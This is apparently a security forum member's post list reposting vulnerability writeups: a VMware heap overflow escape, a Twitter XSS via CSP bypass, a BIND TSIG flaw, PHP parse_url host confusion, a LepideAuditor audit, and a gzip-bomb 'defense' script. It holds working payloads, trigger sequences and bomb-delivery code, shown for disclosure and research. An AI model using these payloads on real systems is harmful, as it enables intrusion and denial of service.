Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. The Weak Bug - Exploiting a Heap Overflow in VMware acez 06 Jul 2017 Share this post Introduction In march 2017, I took part in the pwn2own contest with team Chaitin Security Research Lab. The target I was focused on was VMware Workstation Pro and we managed to get a working exploit before the contest. Unfortunately, a version of VMware was released on March 14th, the day before the contest, with a patch for the vulnerability our exploit was taking advantage of. This blog post is a narrative of our journey from finding the vulnerability to exploiting it. I would like thank @kelwin whose assistance was indispensable during the development of the exploit. I would also like to thank the ZDI folks for their recent blog post which motivated us to get off our asses and make this writeup :P. The post is divided into three parts. First we will briefly describe the VMware RPCI gateway, next we will describe the vulnerability and finally we'll have a look at how we were able to use this single exploit to defeat ASLR and get code execution. The VMware RPCI Unsurprisingly, VMware exposes a number of ways for the guest and host to communicate with each other. One of these ways is through an interface called the Backdoor. The guest is able to send commands through this interface in user mode because of an interesting design. This same interface is used (partly) by VMware Tools in order to communicate with the host. Let's have a look at some sample code (taken from lib/backdoor/backdoorGcc64.c in open-vm-tools): void Backdoor_InOut(Backdoor_proto *myBp) // IN/OUT { uint64 dummy; __asm__ __volatile__( #ifdef __APPLE__ /* * Save %rbx on the stack because the Mac OS GCC doesn't want us to * clobber it - it erroneously thinks %rbx is the PIC register. * (Radar bug 7304232) */ "pushq %%rbx" "\n\t" #endif "pushq %%rax" "\n\t" "movq 40(%%rax), %%rdi" "\n\t" "movq 32(%%rax), %%rsi" "\n\t" "movq 24(%%rax), %%rdx" "\n\t" "movq 16(%%rax), %%rcx" "\n\t" "movq 8(%%rax), %%rbx" "\n\t" "movq (%%rax), %%rax" "\n\t" "inl %%dx, %%eax" "\n\t" /* NB: There is no inq instruction */ "xchgq %%rax, (%%rsp)" "\n\t" "movq %%rdi, 40(%%rax)" "\n\t" "movq %%rsi, 32(%%rax)" "\n\t" "movq %%rdx, 24(%%rax)" "\n\t" "movq %%rcx, 16(%%rax)" "\n\t" "movq %%rbx, 8(%%rax)" "\n\t" "popq (%%rax)" "\n\t" #ifdef __APPLE__ "popq %%rbx" "\n\t" #endif : "=a" (dummy) : "0" (myBp) /* * vmware can modify the whole VM state without the compiler knowing * it. So far it does not modify EFLAGS. --hpreg */ : #ifndef __APPLE__ /* %rbx is unchanged at the end of the function on Mac OS. */ "rbx", #endif "rcx", "rdx", "rsi", "rdi", "memory" ); } Looking at this code, one thing that seems odd is the inl instruction. Under normal circumstances (default I/O privilege level on Linux for instance), a user mode program should not be able to issue I/O instructions. Therefore this instruction should simply just cause the user mode program to fault and crash. This instruction actually generates a privilege error and on the host the hypervisor catches this fault. This ability to communicate with the host from a user land in the guest makes the Backdoor an interesting attack surface since it satisfies the pwn2own requirement: "An attempt in this category must be launched from within the guest operating system from a non-admin account and execute arbitrary code on the host operating system." .The guest puts the value 0x564D5868 in $eax and the I/O port numbers 0x5658 or 0x5659 are stored in $dx for low bandwidth and high bandwidth data transfers respectively. Other registers are used for passing parameters. For instance the lower half of $ecx is used to store the backdoor command number. In the case of RPCI, the command number is set to BDOOR_CMD_MESSAGE = 30. The file lib/include/backdoor_def.h contains a list of some supported backdoor commands. The host catches the fault, reads the command number and dispatches the corresponding handler. There are a lot of other details I am omitting here so if you are interested in this interface you should read the source code. RPCI The Remote Procedure Call Interface is built on top of the aforementioned backdoor and basically allows a guest to issue requests to the host to perform certain operations. For instance, operations like Drag n Drop / Copy Paste as well as number of other random things such as sending or retrieving info on the guest use this interface. The format of RPCI requests is pretty simple: <cmd> <params>. For example the RPCI request "info-get guestinfo.ip" can be used in order to request the IP address assigned to the guest. For each RPCI command, an endpoint is registered and handled in vmware-vmx. Please note that some RPCI commands can also use the VMCI sockets but that is beyond the scope of this article. The Vulnerability After some time reversing the different RPCI handlers, I decided to focus on the DnD and Copy&Paste endpoints. They seemed to be the most complex command handlers and therefore I was hoping it would be the best place to hunt for vulnerabilities. Although I got a chance to understand a lot of the inner workings of DnD/CP, it became apparent however that a lot of the functionality in these handlers is not reachable without user interaction. The core functionality of DnD/CP basically maintains some state machine which has some unsatisfiable states when there is no user interaction (e.g mouse drag from host to guest). At a loss, I decided to have a look at the vulnerabilities that were reported during Pwnfest 2016 and mentioned in this VMware advisory, my idb had a lot of "symbols" at this point so it was easy to use bindiff to find the patches. The code below shows one of the vulnerable functions before it was patched (which turns out has source code available in services/plugins/dndcp/dnddndCPMsgV4.c; the vulnerability is still in master branch of the git repo of open-vm-tools btw): static Bool DnDCPMsgV4IsPacketValid(const uint8 *packet, size_t packetSize) { DnDCPMsgHdrV4 *msgHdr = NULL; ASSERT(packet); if (packetSize < DND_CP_MSG_HEADERSIZE_V4) { return FALSE; } msgHdr = (DnDCPMsgHdrV4 *)packet; /* Payload size is not valid. */ if (msgHdr->payloadSize > DND_CP_PACKET_MAX_PAYLOAD_SIZE_V4) { return FALSE; } /* Binary size is not valid. */ if (msgHdr->binarySize > DND_CP_MSG_MAX_BINARY_SIZE_V4) { return FALSE; } /* Payload size is more than binary size. */ if (msgHdr->payloadOffset + msgHdr->payloadSize > msgHdr->binarySize) { // [1] return FALSE; } return TRUE; } Bool DnDCPMsgV4_UnserializeMultiple(DnDCPMsgV4 *msg, const uint8 *packet, size_t packetSize) { DnDCPMsgHdrV4 *msgHdr = NULL; ASSERT(msg); ASSERT(packet); if (!DnDCPMsgV4IsPacketValid(packet, packetSize)) { return FALSE; } msgHdr = (DnDCPMsgHdrV4 *)packet; /* * For each session, there is at most 1 big message. If the received * sessionId is different with buffered one, the received packet is for * another another new message. Destroy old buffered message. */ if (msg->binary && msg->hdr.sessionId != msgHdr->sessionId) { DnDCPMsgV4_Destroy(msg); } /* Offset should be 0 for new message. */ if (NULL == msg->binary && msgHdr->payloadOffset != 0) { return FALSE; } /* For existing buffered message, the payload offset should match. */ if (msg->binary && msg->hdr.sessionId == msgHdr->sessionId && msg->hdr.payloadOffset != msgHdr->payloadOffset) { return FALSE; } if (NULL == msg->binary) { memcpy(msg, msgHdr, DND_CP_MSG_HEADERSIZE_V4); msg->binary = Util_SafeMalloc(msg->hdr.binarySize); } /* msg->hdr.payloadOffset is used as received binary size. */ memcpy(msg->binary + msg->hdr.payloadOffset, packet + DND_CP_MSG_HEADERSIZE_V4, msgHdr->payloadSize); // [2] msg->hdr.payloadOffset += msgHdr->payloadSize; return TRUE; } This function is called in Version 4 of DnD/CP from the host's side when the guest sends fragment DnD/CP command packets. The host invokes this function in order to reassemble the chunks of the DnD/CP message sent by the guest. The first packet received should have payloadOffset == 0 and binarySize specifying the size of a buffer dynamically allocated on the heap. At [1], there is a check to make sure that the payloadOffset and payloadSize do not go out of bounds by comparing it to the binarySize of the packet header. At [2] , the data is copied to the allocated buffer. However, the check at [1] is flawed because it only works for the first received packet. For subsequent packets, the check is invalid since the code expects the binarySize field of the packet header to match that of the first packet in the fragment stream. You might also have noticed that at [1] there is an integer overflow, but this is actually not exploitable since payloadOffset needs to be set to either 0 or should be equal to expected payloadOffset of the buffered message. Therefore, the vulnerability can be triggered for example by sending the following sequence of fragments: packet 1{ ... binarySize = 0x100 payloadOffset = 0 payloadSize = 0x50 sessionId = 0x41414141 ... #...0x50 bytes...# } packet 2{ ... binarySize = 0x1000 payloadOffset = 0x50 payloadSize = 0x100 sessionId = 0x41414141 ... #...0x100 bytes...# } Armed with this knowledge, I decided to have a look at Version 3 of DnD/CP to see if anything had been missed in there. Lo and behold, the exact same vulnerability was present in Version 3 of the code: (this vulnerability was discovered by reversing, but we later noticed that the code for v3 was also present in the git repo of open-vm-tools.) Bool DnD_TransportBufAppendPacket(DnDTransportBuffer *buf, // IN/OUT DnDTransportPacketHeader *packet, // IN size_t packetSize) // IN { ASSERT(buf); ASSERT(packetSize == (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) && packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE && (packet->payloadSize + packet->offset) <= packet->totalSize && packet->totalSize <= DNDMSG_MAX_ARGSZ); if (packetSize != (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) || packetSize > DND_MAX_TRANSPORT_PACKET_SIZE || (packet->payloadSize + packet->offset) > packet->totalSize || //[1] packet->totalSize > DNDMSG_MAX_ARGSZ) { goto error; } /* * If seqNum does not match, it means either this is the first packet, or there * is a timeout in another side. Reset the buffer in all cases. */ if (buf->seqNum != packet->seqNum) { DnD_TransportBufReset(buf); } if (!buf->buffer) { ASSERT(!packet->offset); if (packet->offset) { goto error; } buf->buffer = Util_SafeMalloc(packet->totalSize); buf->totalSize = packet->totalSize; buf->seqNum = packet->seqNum; buf->offset = 0; } if (buf->offset != packet->offset) { goto error; } memcpy(buf->buffer + buf->offset, packet->payload, packet->payloadSize); buf->offset += packet->payloadSize; return TRUE; error: DnD_TransportBufReset(buf); return FALSE; } This function is called for fragment reassembly of DnD/CP protocol version 3. Here we can see the same situation as before at [1]; trusting that totalSize from the subsequent fragments would match totalSize of the first fragment. Thus this vulnerability can be triggered in a similar fashion to the previous one: packet 1{ ... totalSize = 0x100 payloadOffset = 0 payloadSize = 0x50 seqNum = 0x41414141 ... #...0x50 bytes...# } packet 2{ ... totalSize = 0x1000 payloadOffset = 0x50 payloadSize = 0x100 seqNum = 0x41414141 ... #...0x100 bytes...# } This brings us to the title of this blog post: "The Weak Bug". In the context of a contest like pwn2own, I think the bug is weak because not only was it inspired by a previously reported one, it was pretty much exactly the same one. Therefore it really was no surprise when it was patched before the contest (okay, maybe we didn't expect it to get patched one day before the contest :P). The corresponding VMware advisory can be found here. The latest version of VMware Workstation Pro affected by this bug is version 12.5.3. We can now have a look at how to abuse the vulnerability and come up with a guest to host escape! Exploitation We want to gain code execution through this vulnerability so we need to either find a function pointer to overwrite on the heap or to corrupt the vtable of a C++ object. First though, let's have a look at how to set the DnD/CP protocol to version 3. This can be done by sending the following sequence of RPCI commands: tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version The first two lines respectively set the versions of DnD and Copy/Paste. The latter two lines query the versions. They are required because querying the versions is what actually causes the version to be switched. The RPCI command handler for the vmx.capability.dnd_version checks if the version of the DnD/CP protocol has been modified and if so, it will create a corresponding C++ object for the specified version. For version 3, two C++ objects of size 0xA8 are created; one for DnD commands and one for Copy/Paste commands. The vulnerability gives us control over the allocation size as well as the overflow size but it also allows us to write out of bounds multiple times. Ideally we can just allocate an object of size 0xA8 and make it land before the C++ object then overwrite the vtable pointer with a pointer to controlled data to get code execution. It is not as simple as that however, since there are a few things we need to address first. Mainly we need to find a way to defeat ASLR which in our case implies also dealing with the Windows Low Fragmented Heap. Defeating ASLR We need to find an object we can overflow into and somehow influence it to get us in info leak; like an object we can read back from the guest with a length field or a data pointer we can easily corrupt. We were unable to find such an object so we decided to reverse the other RPCI command handlers a bit more and see what we could come up with. Of particular interest were commands that had counter parts, in other words, you can use one command to set some data and then use another related command to retrieve the data back. The winner was the info-set and info-get command pair: info-set guestinfo.KEY VALUE info-get guestinfo.KEY VALUE is a string and its string length controls the allocation size of a buffer on the heap. Moreover we can allocate as many strings as we want in this way. But how can we use these strings to leak data ? Simply by overwriting past the null byte and "lining" up the string with the adjacent chunk. If we can allocate a string (or strings) between the overflowing chunk and a DnD or CP object, then we can leak the vtable address of the object and hence the base address of vmware-vmx. Since we can allocate many strings, we can increase our chances of obtaining this heap layout despite the randomization of the LFH. However there is still an aspect of the allocations we do not control and that is whether a DnD or CP object is allocated after our overflowing heap chunk. From our tests, we were able to get a probability of success between 60% and 80% by playing with different parameters of our exploit such as allocating and free'ing different amounts of strings. In summary, we have the following (Ov is the overflowing chunk, S is a string and T is the target object): The plan is basically to allocate a number of strings filled with A's for example then we overflow the adjacent chunk with some B's, read back the value of all the allocated strings, the one that contains B's is the one we have corrupted. At this point we have a string we can use to read the leak with, so we can keep overflowing with a granularity matching the size of the objects in the bucket (0xA8) and reading back the string every time to check if there is some leaked data in the string. We can know that we have reached the target object because we know the offsets (from the vmware-vmx base) of the vtables of the DnD and CopyPaste objects. Therefore after each overflow, we can look at the last bits of the retrieved data to see if they match that of the vtable offsets. Getting Code Execution Now that we have obtained the info leak and know what type of C++ object we are about to overflow we can proceed with the rest of the exploitation. There are two cases we need to handle, CopyPaste and DnD. Please note that this is probably just one line of exploitation out of many others. The CopyPaste case In the case of the CopyPaste object, we can just overwrite the vtable and make it point to some data we control. We need a pointer to controlled data which will be interpreted as the vtable address of the object. The way we decided to do this is by using another RPCI command: unity.window.contents.start. This command is used for the Unity mode to draw some images on the host and allows us to have some values that we control at a know offset from the base address of vmware-vmx. To of the arguments taken by the command are width and height of the image, each of them a 32-bit word. By combining the two, we can have a 64-bit value at a known address. We line it up with the vtable entry of the CopyPaste object that we can trigger by just sending a CopyPaste command. In summary we do the following: Send a unity.window.contents.start to write a 64-bit address of a stack pivot gadget at a know address with the height and width parameters. Overwrite the vtable address with a pointer to the 64-bit address (adjusted with the offset of the vtable entry that will be called). Trigger the use of the vtable by sending a CopyPaste command. ROP. The DnD case In the case of the DnD object, we can't just overwrite the vtable because right after the overflow the vtable is accessed to call another method so we need to do it another way. This is because we only know the address of 1 qword that we control through the unity image's width and height, so we can't forge a vtable of the size we want. Let's have a look at the structure of the DnD and CP objects which can be summarized as follows (again, some similar structures can be found in open-vm-tools but they have slightly different formats in vmware-vmx): DnD_CopyPaste_RpcV3{ void * vtable; ... uint64_t ifacetype; RpcUtil{ void * vtable; RpcBase * mRpc; DnDTransportBuffer{ uint64_t seqNum; uint8_t * buffer; uint64_t totalSize; uint64_t offset; ... } ... } } RpcBase{ void * vtable; ... } A lot of fields have been omitted since they are irrelevant for the purpose of this blog post. There is a pointer to an RpcBase object which is also a C++ object. Therefore if we can overwrite the mRpc field with a pointer-to-pointer to data we control, we can have a vtable of our liking for the RpcBase object. For this pointer we can also use the unity.window.contents.start command. Another parameter the command takes on top of width and height is imgsize, which controls the size of the image buffer. This buffer is allocated and its address can also be found at a static offset from the vmware-vmx base. We can populate the contents of the buffer by using the unity.window.contents.chunk command. In summary we do the following: Send a unity.window.contents.start command to allocate a buffer where we will store a fake vtable. Send a unity.window.contents.chunk command to populate the fake vtable with some stack pivot gadget. Overwrite the mRpc field of the DnD object with an address pointing to the address of the allocated buffer. Trigger the use of the vtable of the mRpc field by sending a DnD command. ROP. P.S: There is a RWX page in vmware-vmx (at least in version 12.5.3). Notes on Reliability As mentioned earlier, the exploit is not 100% reliable due to the Windows LFH. Some things can be attempted in order to increase the reliability. Here is a short list: Monitor allocations of size 0xA8 to see if we can take advantage of the determinism of the LFH after a number of malloc's() and free's() as described here and here. Find some other C++ objects to overwrite, preferably some that we can spray. Find some other objects on the heap with function pointers, preferably some that we can spray. Find a seperate info leak bug that we can use as an oracle. Be more creative. Useless Video Here is a video of the exploit in "action". (Yes, it's VMware inside VMware.) Conclusion "No pwn no fun" and make sure that if you want to take part in some contest like pwn2own you either have multiple bugs or you find some inspired vulnerabilities. Sursa: http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/
      • 1
      • Upvote
  2. Meet Hydrogen One, World's First Android Smartphone with Holographic Display Will be the control center of RED's upcoming Hydrogen System Jul 6, 2017 20:19 GMT · By Marius Nestor · RED, the leading manufacturer of professional digital cinema cameras, announced that it would develop the world's first holographic Android smartphone, which the company will launch sometime next year. Dubbed as Hydrogen One Media Machine, the standalone, unlocked smartphone is powered by Google's Android mobile operating system and promises to obsolete glasses to enjoy multi-dimensional content. RED is known for its innovative, modular camera systems that offer groundbreaking image quality, but with Hydrogen One they want to offer the world a new "look around depth" experience right in the palm of your hand. The device will have a 5.7-inch professional holographic display that features nanotechnology, and it's designed from the offset to seemingly switch between 2D and 3D content, interactive games, and holographic multi-view content. Both landscape and portrait modes will be supported by the ingenious display of Hydrogen One Media Machine, which will support RED's H4V (Hydrogen 4-View) content, stereo 3D content, as well as 2D and 3D VR, MR, and AR. The foundation of a future multi-dimensional system In terms of audio quality, RED will embed a proprietary H3O algorithm in the Android OS that powers Hydrogen One, which converts stereo sound into expansive multi-dimensional audio. RED plans to develop Hydrogen One as the first piece of a future multi-dimensional system that the company works on and calls it the Hydrogen System. Hydrogen One being the control center of this upcoming modular system. "The HYDROGEN SYSTEM incorporates a new high-speed data bus to enable a comprehensive and ever-expanding modular component system, which will include future attachements for shooting higher quality motion and still images as well as HYDROGEN format holographic images," says RED in the press announcement. The Hydrogen One Media Machine will sell starting at $1,195 USD for the aluminium variant and $1,595 USD for the titanium one. It will integrate with the RED camera program and allow access to the Red Channel, which contains only 4-View holographic content. The device is planned for Q1 2018. Sursa: http://news.softpedia.com/news/meet-hydrogen-one-world-s-first-android-smartphone-with-holographic-display-516858.shtml
      • 1
      • Upvote
  3. tbmnull Jul 6 Making an XSS triggered by CSP bypass on Twitter. Hi there, I’m a security researcher & bug hunter, but still learning. I want to share how hard it was to find an XSS (Cross Site Scripting) on such a huge organization and well secured Twitter.com and how I could achieve it with combining another security vulnerability CSP (Content Security Policy) bypass. Here is the story: After digging a lot on Twitter’s subdomains, I came across to https://careers.twitter.com/. As you can guess, it is Twitter’s career site, you can search for jobs as an opportunity to work with them, but I search for bugs. Sometime later, I thought I’ve found a reflection for an XSS on the URL: https://careers.twitter.com/en/jobs-search.html?location=1" onmouseover=”alert(1)&q=1&start=70&team= with the location parameter. But wait, there was no alert! I couldn’t be able to trigger it! Because they’ve implemented CSP as: content-security-policy: default-src ‘self’ ; connect-src ‘self’ ; font-src ‘self’ https://*.twimg.com https://*.twitter.com data:; frame-src ‘self’ https://twitter.com https://*.twitter.com [REDACTED] https://*.twitter.com; report-uri https://twitter.com/i/csp_report and It blocked the javascript alert box to be come to scene. So, I was unsuccessful on getting this work, unfortunately. Then I applied to my master @brutelogic as always and asked him that I’ve found some XSS (didn’t share the details nor domain) but I could not be able to get it work because of the CSP. He adviced me to find a way to bypass it! I already remember his saying: “For god’s sake, stop talking and go find a way to bypass the CSP!”. Thanks bro :) I tried a lot to find the way, and gave up that time. After trying a lot and looking for something on other domains, I figured out an URL that’s going under the radar within GET requests hiddenly. URL was: https://analytics.twitter.com/tpm?tpm_cb= The response Content-type was application/javascript and what I write as the parameter tpm_cb, it was reflecting on the page! I was lucky this time, and I tried to combine both my findings to make the XSS work. So, I created: https://careers.twitter.com/en/jobs-search.html?location=1"> src=//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>// willing “><script src= on the XSS reflection will work. And voila! It worked! Happy End! I screamed out in my office and all my colleagues were afraid. Sorry guys :) I immediately reported these to Twitter via their bug bounty program on Hackerone, they triaged and rewarded me very quickly. Also they fixed the XSS on career site but CSP bypass took a long time to fix. But in the end both sides were satisfied. Thanks to Twitter Security Team and an awesome community hackerone! Hope this helps newbies like me to develop themselves. And If you want to share your thoughts, just ping me on Twitter: @tbmnull Thanks for reading. Sursa: https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
      • 3
      • Upvote
      • Like
  4. TSIG authentication bypass through signature forgery in ISC BIND Synacktiv experts discovered a flaw within the TSIG protocol implementation in BIND that would allow an attacker knowing a valid key name to bypass the TSIG authentication on zone updates, notify and transfers operations. This issue is due to the fact that when a wrong TSIG digest length is provided (aka the digest doesn’t have a length that matches the hash algorithm used), the server still signs its answer by using the provided digest as a prefix. This allows an attacker to forge the signature of a valid request, hence bypassing the TSIG authentication. Download: http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
      • 2
      • Upvote
  5. Publicat pe 5 iul. 2017 Ad-hoc session working on pivoted packets through Meterpreter. Not finished, more to do, but small chunks of progress.
      • 4
      • Upvote
      • Like
  6. How to defend your website with ZIP bombs the good old methods still work today Posted by Christian Haschek on 2017-07-05 [update] I'm on some list now that I have written an article about some kind of "bomb", ain't I? If you have ever hosted a website or even administrated a server you'll be very well aware of bad people trying bad things with your stuff. When I first hosted my own little linux box with SSH access at age 13 I read through the logs daily and report the IPs (mostly from China and Russia) who tried to connect to my sweet little box (which was actually an old ThinkPad T21 with a broken display running under my bed) to their ISPs. Actually if you have a linux server with SSH exposed you can see how many connection attempts are made every day: grep 'authentication failures' /var/log/auth.log Hundreds of failed login attempts even though this server has disabled password authentication and runs on a non-standard port Wordpress has doomed us all Ok to be honest, web vulnerability scanners have existed before Wordpress but since WP is so widely deployed most web vuln scanners include scans for some misconfigured wp-admin folders or unpatched plugins. So if a small, new hacking group wants to gain some hot cred they'll download one of these scanner things and start testing against many websites in hopes of gaining access to a site and defacing it. Sample of a log file during a scan using the tool Nikto This is why all server or website admins have to deal with gigabytes of logs full with scanning attempts. So I was wondering.. Is there a way to strike back? After going through some potential implementations with IDS or Fail2ban I remembered the old ZIP bombs from the old days. WTH is a ZIP bomb? So it turns out ZIP compression is really good with repetitive data so if you have a really huge text file which consists of repetitive data like all zeroes, it will compress it really good. Like REALLY good. As 42.zip shows us it can compress a 4.5 peta byte (4.500.000 giga bytes) file down to 42 kilo bytes. When you try to actually look at the content (extract or decompress it) then you'll most likely run out of disk space or RAM. How can I ZIP bomb a vuln scanner? Sadly, web browsers don't understand ZIP, but they do understand GZIP. So firstly we'll have to create the 10 giga byte GZIP file filled with zeroes. We could make multiple compressions but let's keep it simple for now. dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip Creating the bomb and checking its size As you can see it's 10 MB large. We could do better but good enough for now. Now that we have created this thing, let's set up a PHP script that will deliver it to a client. <?php //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); That's it! So we could use this as a simple defense like this: <?php $agent = lower($_SERVER['HTTP_USER_AGENT']); //check for nikto, sql map or "bad" subfolders which only exist on wordpress if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/')) { sendBomb(); exit(); } function sendBomb(){ //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); } function startsWith($haystack,$needle){ return (substr($haystack,0,strlen($needle)) === $needle); } This script obviously is not - as we say in Austria - the yellow of the egg, but it can defend from script kiddies I mentioned earlier who have no idea that all these tools have parameters to change the user agent. Sooo. What happens when the script is called? Client Result IE 11 Memory rises, IE crashes Chrome Memory rises, error shown Edge Memory rises, then dripps and loads forever Nikto Seems to scan fine but no output is reported SQLmap High memory usage until crash (if you have tested it with other devices/browsers/scripts, please let me know and I'll add it here) Reaction of the script called in Chrome If you're a risk taker: Try it yourself Sursa: https://blog.haschek.at/post/f2fda
      • 8
      • Upvote
  7. Kernel Pool Overflow Exploitation In Real World – Windows 7 1) Introduction This article will focus on a vulnerability (CVE-2017-6008) we identified in the HitmanPro standalone scan version 3.7.15 – Build 281. This tool is a part of the HitmanPro.Alert solution and has been integrated in the Sophos solutions as SophosClean.exe. The vulnerability has been reported to Sophos in February 2017. The version 3.7.20 – Build 286 patched the vulnerability in May 2017. We discovered the first crash while playing with Ioctlfuzzer [1]. Ioctlfuzzer is a great and simple tool made to fuzz the I/O Request Packets (IRP). The fuzzer hooks the DeviceIoControlFile API function and place itself as a man in the middle. For each IRP the fuzzer receives, it lands severals malformed IRP before sending the original one. The first crash occured at the very beginning of the scan, in the Initialization phase, with a BAD_POOL_HEADER code. Before going deeper, I strongly recommand readers learn a bit more on IOCTL and IRP on Windows. The MSDN documentation provides a lot of informations you must know to fully understand this article. This blogpost will be focused on x64 architectures, since it’s harder to exploit than x32 architectures. Article: http://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/
      • 2
      • Upvote
  8. Description: ------------ url like these - http://example.com:80#@google.com/ - http://example.com:80?@google.com/ parse_url return wrong host. https://tools.ietf.org/html/rfc3986#section-3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI. This problem has been fixed in 7.1. https://github.com/php/php-src/pull/1607 But, this issue should be recognized as security issue. example: - bypass authentication protocol (verify hostname of callback url by parse_url) - open redirector (verify hostname by parse_url) - server-side request forgery (verify hostname by parse_url and get_content) Test script: --------------- php > echo parse_url("http://example.com:80#@google.com/")["host"]; google.com php > echo parse_url("http://example.com:80?@google.com/")["host"]; google.com php > echo file_get_contents("http://example.com:80#@google.com"); ... contents of example.com ... Expected result: ---------------- parse_url("http://example.com:80#@google.com/")["host"]; example.com or parse error. Sursa: https://cxsecurity.com/issue/WLB-2017070054
      • 1
      • Upvote
  9. Google CTF 2017 – Pwnables – Inst_Prof – Writeup Hello my friends, let me tell you a short (wrong: rather long) story. Once about a time there was a “capture the flag” (CTF) competition, held by the well known, loaded-with-smart-people company, Google. I kind of missed the announcement of that CTF and had been in Dublin for a bit of a holidays … when I saw my Twitter feed getting loaded with status updates from people who were trying to crack the various tasks. Of course I had to try this then as well – and since I am a massive fan of cracking/hacking/reversing binaries, I checked out the “easy” target called “inst_prof”. Link: https://dilsec.wordpress.com/2017/07/06/google-ctf-2017-pwnables-inst_prof-writeup/
  10. Auditing the Auditor July 5, 2017Exploit Development, Offensive Security, Penetration Testing Some time ago, we noticed some security researchers looking for critical vulnerabilities affecting “security” based products (such as antivirus) that can have a damaging impact to enterprise and desktop users. Take a stroll through the Google Project Zero bug tracker to see what we mean. Other security researchers are outspoken about such products as well: The underlying point is that on the face of it, the wider community assumes that security products are themselves secure and often don’t comprehend the significant increase of attack surface introduced by so-called security products. Thanks to the work of security researchers, antivirus has been proven to fall short of the big enterprise giants, who already implement sandbox technologies, strong exploit mitigation technologies, and have evolving and maturing bug bounty programs. While we all love a good antivirus remote code execution vulnerability, many intelligent people are already working in that space so we decided to begin auditing compliance-based enterprise software products. This type of software typically tries to ensure some level of security and compliance, promising high integrity to the enterprise market. Today, we’re going to discuss an interesting vulnerability that was discovered well over a year ago (Sun, 22 May 2016 at 7pm to be exact) during the audit of one such compliance-based enterprise product: LepideAuditor Suite. This vulnerability was publicly disclosed as ZDI-17-440 and marked as zero-day since no reply was received from the vendor. Interestingly, this vulnerability is patched in the latest version of LepideAuditor even though there is no mention of it in the product’s release history. The product introduction states that it is designed for IT security managers and audit personal among a few others and it allows users to access real-time reports through a “secure” web portal. Without further ado, let’s begin! Installation The suite is designed for IT security managers and audit personal among a few others. The suite consists of four components that can be installed after extracting the lepideauditorsuite.zip package. The first component that we installed was the “Lepide Auditor Web Console” The component installation is easy. With a double-click, we deployed the simple WAMP stack that Lepide provided on port 7778. Auditing With the application up and running, we started by looking at Process Explorer to see what was going on: We noticed that the web console is simply an Apache web server running as NT AUTHORITY/SYSTEM listening on port 7778. The properties window also displayed the current directory as C:\LepideAuditorSuiteWebConsole\apache so this is a good place to look first. Browsing around this path in Explorer revealed something interesting: It’s our good friend PHP and like many people, we love ourselves a good PHP target. Authentication Bypass Looking for some low-hanging fruit, we decided to start with a blackbox approach and spend some time poking around at the authentication mechanism: Right away, we noticed that the authentication process took a long time (around about 6 seconds) to get a response from the server. We also noticed that the application was asking for an extra server parameter as input, which is not normal, during authentication. It turns out that the extra time taken was because Apache was performing a DNS lookup request using ‘test’. Since we did not have login credentials and could not reach much functionality without them, we moved on to auditing the PHP source code directly. The first thing we looked at was the login functionality, apparently implemented by index.php. Opening up the file revealed the following: Full disclosure: we admit we got a bit of a chuckle over this. Whilst security through obscurity is fine for things like ASLR, it doesn’t make much sense for source code, especially using base64 as the obfuscation technique. We would at least expect a JIT obfuscation technique such as ionCube or Zend Guard. After breaking through the imposing base64 encoding, we saw the following code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 <?php session_start(); if((isset($_SESSION["username"]))&&($_SESSION["username"]!="")) { //header("location: data.php" ); //exit(); } ?> <?php include_once("config.php"); ?> <?php $error=''; if(isset($_POST["submit"])) { $servername = isset($_POST["servername"])?mysql_real_escape_string($_POST["servername"]):""; $username = isset($_POST["username"])?mysql_real_escape_string($_POST["username"]):""; $password = isset($_POST["password"])?mysql_real_escape_string($_POST["password"]):""; if ($servername=="") { $error= "Please Enter Server Name"; } elseif ($username=="") { $error= "Please Enter Username"; } //elseif (strpos($username,'@')==false) { // $error= 'Please Enter Valid Username'; //} elseif ($username=="") { $error= "Please Enter Password"; } if($error=="") { $port=1056; $sock=connect ($servername,$port); if($sock) { $_SESSION["socket"]=$sock; $data= 601; //authenticate login if(sendtags($_SESSION["socket"],$data)) { if(sendstringtoserver($_SESSION["socket"],$username)) { if(sendstringtoserver($_SESSION["socket"],$password)) { $recv= getstringfromserver($_SESSION["socket"]); if ($recv =='_SUCCESS_') { $_SESSION["username"]=$username; $_SESSION["ip"]=$servername; $_SESSION["password"]=$password; $_SESSION["sessionno"]=rand(10,100); session_write_close(); header("location: reports" ); exit(); } Looking at the code, we see that it includes config.php, which of course, also looks interesting. However, to begin with, the code is taking user-supplied input as the server variable along with a hard-coded port number, and passing it to the connect() function on line 31. Let’s take a look at that function within the config.php file: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 function connect ($ip,$port) { if (!extension_loaded('sockets')) { die('The sockets extension is not loaded.'); } if(!($sock = socket_create(AF_INET, SOCK_STREAM, 0))) { $errorcode = socket_last_error(); $errormsg = socket_strerror($errorcode); die("Couldn't create socket: [$errorcode] $errormsg \n"); } 